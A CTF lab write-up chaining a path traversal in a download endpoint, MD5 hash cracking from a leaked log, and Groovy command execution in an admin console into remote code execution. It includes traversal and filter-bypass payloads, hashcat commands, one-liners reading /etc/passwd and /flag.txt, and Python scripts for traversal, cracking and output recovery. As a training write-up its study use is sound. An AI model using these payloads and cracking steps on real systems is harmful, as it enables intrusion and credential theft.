Path Traversal to RCE: Bug Bounty Write-Up POC
Introduction
Bug bounty hunting is all about persistence and creativity. This write-up documents my approach to a CTF lab that simulates a real-world vulnerability, inspired by the $40,000 bounty write-up by Abdullah Nawaf and Orwa Atyat. In this challenge, I exploited a path traversal vulnerability on ev3spph9.eu2.ctfio.com and escalated it to remote code execution (RCE).
Reconnaissance & Discovery
Target: ev3spph9.eu2.ctfio.com
Tools Used:
- nmap for port scanning:
nmap -p- ev3spph9.eu2.ctfio.com
- ffuf for directory fuzzing:
ffuf -u http://ev3spph9.eu2.ctfio.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- gobuster for additional enumeration:
gobuster dir -u https://ev3spph9.eu2.ctfio.com -w /usr/share/wordlists/dirb/common.txt
Output:
/admin (Status: 302) [Size: 0] [--> /admin/faces/jsf/login.xhtml]
I found an admin panel at http://ev3spph9.eu2.ctfio.com/admin/faces/jsf/login.xhtml and a /download/ endpoint that hinted at file retrieval functionality. The redirect to a faces/jsf/*.xhtml page identifies the application as JavaServer Faces (JSF), a Java servlet application, which is what makes /WEB-INF/web.xml a worthwhile target once a file read is found.
Exploiting Path Traversal
Fuzzing the download endpoint revealed the vulnerable filename parameter:
wfuzz -c -z file,/usr/share/wordlists/common.txt --hh=404 "http://ev3spph9.eu2.ctfio.com/admin/download?filename=FUZZ"
(Note that --hh filters responses by character count; to hide responses by HTTP status code, wfuzz uses --hc 404.)
Supplying a traversal sequence in filename let me read files outside the intended download directory, such as /WEB-INF/web.xml. That file is the servlet deployment descriptor, which lists the application's servlets and their URL mappings, so it revealed internal endpoints.
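To make the traversal concrete, here is an added example (my own code, not the lab's or the write-up author's) that models the download servlet in Python against a constructed in-memory filesystem. The deployment paths, the file contents and the "stripped" filter are assumptions; what it demonstrates is the raw concatenation sink, why the common "delete ../ once" fix is bypassed by ....// and by double URL-encoding when the application decodes a second time, and a resolver that decodes first, rejects separators, and checks the canonical path. It goes slightly beyond the write-up by showing which payload class works against which implementation.

```python
import posixpath
import urllib.parse

# Hypothetical deployment layout for the servlet behind /admin/download
# (assumed; the lab's real paths are not given in the write-up).
WEBROOT = "/opt/app/webapps/ROOT"
DOWNLOAD_DIR = WEBROOT + "/downloads"

# Constructed stand-in for the server's filesystem: absolute path -> contents.
FAKE_FS = {
    DOWNLOAD_DIR + "/report.pdf": "%PDF-1.4 (constructed)",
    WEBROOT + "/WEB-INF/web.xml": "<web-app><servlet-mapping>...</servlet-mapping></web-app>",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash",
}


def container_decode(raw_param):
    """The servlet container URL-decodes query parameters once before the app sees them."""
    return urllib.parse.unquote(raw_param)


def vulnerable_resolve(filename):
    """Concatenate user input onto the base directory: the traversal sink."""
    return posixpath.normpath(DOWNLOAD_DIR + "/" + filename)


def stripped_resolve(filename):
    """A common, broken fix: delete '../' and then decode the value again.

    Deleting the sequence once is defeated by '....//' (one deletion leaves
    '../'), and decoding after the check is defeated by a double-encoded
    '..%252f', which reaches the check as '..%2f' with no literal '../'.
    """
    cleaned = filename.replace("../", "")
    cleaned = urllib.parse.unquote(cleaned)
    return posixpath.normpath(DOWNLOAD_DIR + "/" + cleaned)


def hardened_resolve(filename):
    """Decode first, reject separators, then verify the canonical path.

    The endpoint only serves flat files, so a bare file name is the allowlist;
    the commonpath check is a second, independent guard. On a real filesystem
    use os.path.realpath() so a symlink cannot point the canonical path outside
    DOWNLOAD_DIR.
    """
    decoded = urllib.parse.unquote(filename)
    if not decoded or "\x00" in decoded or "/" in decoded or "\\" in decoded:
        raise PermissionError("filename must be a bare file name")
    candidate = posixpath.normpath(posixpath.join(DOWNLOAD_DIR, decoded))
    if posixpath.commonpath([candidate, DOWNLOAD_DIR]) != DOWNLOAD_DIR:
        raise PermissionError("path escapes the download directory")
    return candidate


def download(resolver, raw_param):
    """Serve a file through the given resolver; None means blocked or missing."""
    try:
        path = resolver(container_decode(raw_param))
    except PermissionError:
        return None
    return FAKE_FS.get(path)


# Payloads of the kind wfuzz feeds to the filename parameter (constructed).
PAYLOADS = [
    "report.pdf",                  # legitimate request
    "../WEB-INF/web.xml",          # plain traversal
    "....//WEB-INF/web.xml",       # survives a single strip of '../'
    "..%252fWEB-INF/web.xml",      # double-encoded; needs a second decode
    "../../../../../etc/passwd",   # five levels up from DOWNLOAD_DIR
]


def probe(resolver):
    """Map each payload to what the resolver would serve (None = not served)."""
    return {p: download(resolver, p) for p in PAYLOADS}


if __name__ == "__main__":
    for name, r in [("vulnerable", vulnerable_resolve),
                    ("stripped", stripped_resolve),
                    ("hardened", hardened_resolve)]:
        print(name, {p: v is not None for p, v in probe(r).items()})
```

Note that ....// is not a traversal by itself (the raw sink treats .... as an ordinary directory name); it only works against the strip-once filter, which is why a fuzz wordlist should carry both plain and filter-bypass forms.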
Credential Discovery & Admin Access
A log archive at /admin/incident-report contained hashed credentials. Fetching and extracting it:
curl -O http://ev3spph9.eu2.ctfio.com/admin/incident-report
unzip incident-report-*.zip
cat incident.log
(curl -O names the download after the last URL path component, here incident-report; if the saved file does not match incident-report-*.zip, add -J so curl honours the server's Content-Disposition filename, or unzip it under whatever name it was saved as.)
The extracted hashes were cracked with hashcat (mode 0 is raw, unsalted MD5) and cross-checked on CrackStation:
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
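As an added example of the cracking step (my own code, not the write-up's), the script below pulls user/hash pairs out of a constructed incident.log excerpt, guesses the algorithm from the digest length (and the matching hashcat -m mode), and runs a dictionary attack with a constructed mini wordlist standing in for rockyou.txt. The log line format, usernames and wordlist are assumptions; the digests are real MD5/SHA-1 values of common passwords.

```python
import hashlib
import re

# Constructed excerpt in the style of the incident.log described above;
# the field names and layout are assumptions, not the lab's real format.
INCIDENT_LOG = """\
2024-03-01T09:12:44Z WARN  auth  login failed user=admin hash=5f4dcc3b5aa765d61d8327deb882cf99
2024-03-01T09:12:51Z WARN  auth  login failed user=exporter hash=0d107d09f5bbe40cade3de5c71e9e9b7
2024-03-01T09:13:02Z WARN  auth  login failed user=backup hash=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
2024-03-01T09:13:10Z WARN  auth  login failed user=ops hash=ffffffffffffffffffffffffffffffff
2024-03-01T09:14:00Z INFO  export step2 started by user=admin
"""

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "admin", "letmein", "qwerty", "welcome1"]

# Unsalted hex digests are recognisable by length alone. The second field is
# the matching hashcat hash mode (-m), which is how mode 0 above was chosen.
DIGEST_BY_LENGTH = {
    32: ("md5", 0),
    40: ("sha1", 100),
    64: ("sha256", 1400),
}

LINE_RE = re.compile(r"user=(?P<user>\S+)\s+hash=(?P<hash>[0-9a-fA-F]{32,64})")


def extract_hashes(log_text):
    """Return [(user, hex_digest), ...] for every credential line in the log."""
    found = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m and len(m.group("hash")) in DIGEST_BY_LENGTH:
            found.append((m.group("user"), m.group("hash").lower()))
    return found


def identify(hex_digest):
    """Guess (algorithm, hashcat mode) from digest length; None if unknown."""
    return DIGEST_BY_LENGTH.get(len(hex_digest))


def crack(hex_digest, wordlist):
    """Dictionary attack: hash each candidate with the guessed algorithm."""
    info = identify(hex_digest)
    if info is None:
        return None
    algo = info[0]
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == hex_digest:
            return word
    return None


def crack_log(log_text, wordlist):
    """Map each user in the log to its cracked password (None if not found)."""
    return {user: crack(h, wordlist) for user, h in extract_hashes(log_text)}


if __name__ == "__main__":
    for user, pw in crack_log(INCIDENT_LOG, WORDLIST).items():
        print(f"{user}: {pw if pw else '<not in wordlist>'}")
```

Length-based identification is only a first guess (a 32-hex-character string could equally be NTLM or MD4), so if hashcat reports no matches for mode 0, try the other modes of the same length before concluding the password is absent from the wordlist.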
Logging in as admin at /admin/faces/jsf/login.xhtml gave access to a script execution console (export_step2.xhtml).
Achieving RCE
The console accepted Groovy. In Groovy, calling .execute() on a String runs that string as a system command and .text collects its standard output, so each of the following is a one-line command execution:
println "id".execute().text                  // which account is the application running as?
println "cat /flag.txt".execute().text       // read the flag directly
print "id".execute().text                    // same, without a trailing newline
print "cat /etc/passwd".execute().text
return ["id".execute().text, "cat /flag.txt".execute().text]   // hand both outputs back as the script's return value
Since none of the output was displayed in the console response, I pulled the incident report again to see whether it had landed in the log:
curl -O http://ev3spph9.eu2.ctfio.com:8443/admin/incident-report
unzip incident-report-*.zip
cat incident.log
Executing:
print "cat /flag.txt".execute().text
and reading the refreshed incident.log surfaced the flag.
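The "output only shows up in the log" situation is common enough to be worth automating. The following is an added example (my own code, not from the write-up) that reproduces the fetch, unzip and compare workflow offline: it builds a constructed incident-report archive in memory, extracts incident.log, diffs it against a baseline snapshot taken before the script was submitted, and picks out id(1)-style output and flag-shaped strings from the new lines. The log format, the tomcat account name and the flag text are all constructed.

```python
import io
import re
import zipfile


def build_report_zip(log_text, member="incident.log"):
    """Constructed stand-in for the archive served at /admin/incident-report."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, log_text)
    return buf.getvalue()


def read_incident_log(zip_bytes, member="incident.log"):
    """Equivalent of `unzip` followed by `cat`, without touching disk."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(member).decode("utf-8", errors="replace")


def new_lines(before, after):
    """Lines appended to the log since the baseline snapshot.

    If the log is append-only, the new snapshot starts with the old one and
    the tail is exactly what was added; otherwise (rotation, truncation)
    fall back to an ordered set difference.
    """
    old = before.splitlines()
    new = after.splitlines()
    if new[:len(old)] == old:
        return new[len(old):]
    seen = set(old)
    return [line for line in new if line not in seen]


# Shapes of the output the Groovy one-liners above produce.
ID_RE = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+\([^)]*\)(?:\s+groups=\S+)?")
FLAG_RE = re.compile(r"\bflag\{[^}]*\}")


def find_command_output(lines):
    """Pull id(1)-style output and flag-shaped strings out of log noise."""
    hits = []
    for line in lines:
        for pat in (ID_RE, FLAG_RE):
            m = pat.search(line)
            if m:
                hits.append(m.group(0))
    return hits


# Constructed snapshots: before and after submitting the script.
BASELINE = (
    "2024-03-01T09:14:00Z INFO export step2 started by user=admin\n"
    "2024-03-01T09:14:01Z INFO export script queued\n"
)
AFTER = BASELINE + (
    "2024-03-01T09:14:02Z INFO script stdout: uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat)\n"
    "2024-03-01T09:14:03Z INFO script stdout: flag{constructed_example_flag}\n"
)


def recover_output(before_zip, after_zip):
    """End-to-end: two downloaded archives in, recovered command output out."""
    before = read_incident_log(before_zip)
    after = read_incident_log(after_zip)
    return find_command_output(new_lines(before, after))


if __name__ == "__main__":
    print(recover_output(build_report_zip(BASELINE), build_report_zip(AFTER)))
```

Taking the baseline snapshot before submitting the script is the important habit: on a busy application the log fills with unrelated entries, and the diff is what keeps the command output from being lost in them.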
Key Takeaways
- Chaining bugs—a small vulnerability can lead to full compromise.
- Check logs for output when commands don’t return results.
- Persistence wins—keep testing different angles.
Conclusion
By combining multiple issues, I escalated from path traversal to RCE. This lab reinforced the importance of exploring beyond the initial vulnerability for maximum impact.